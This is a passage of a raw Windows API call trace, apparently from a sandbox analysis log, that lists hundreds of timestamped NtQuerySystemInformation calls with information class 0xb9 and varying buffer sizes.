(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x28, ResultLength=0x0) [0273.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0273.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0273.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x50, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x50, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x50, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x50, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x50, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x50, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x50, ResultLength=0x0) [0273.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3d0, Length=0x38, ResultLength=0x0) [0273.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc200, Length=0x28, ResultLength=0x0) [0273.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc200, Length=0x28, ResultLength=0x0) [0273.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc200, Length=0x28, ResultLength=0x0) [0273.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc200, Length=0x28, ResultLength=0x0) [0273.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc270, Length=0x28, ResultLength=0x0) [0273.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3d0, Length=0x38, ResultLength=0x0) [0273.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc2f0, Length=0x28, ResultLength=0x0) [0273.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc2f0, Length=0x28, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc190, Length=0x20, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc110, Length=0x20, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc110, Length=0x20, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc110, Length=0x20, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3d0, Length=0x38, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3d0, Length=0x38, ResultLength=0x0) [0273.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc250, Length=0x20, ResultLength=0x0) [0273.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc1e0, Length=0x20, ResultLength=0x0) [0273.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc1e0, Length=0x20, ResultLength=0x0) [0273.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0273.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0273.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0273.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0273.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0273.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0273.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0273.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0273.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x28, ResultLength=0x0) [0273.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0273.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x20, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x20, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0273.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0273.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0273.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x50, ResultLength=0x0) [0273.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0273.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0273.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0273.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x28, ResultLength=0x0) [0273.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x28, ResultLength=0x0) [0273.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0273.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x38, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc430, Length=0x20, ResultLength=0x0) [0273.197] 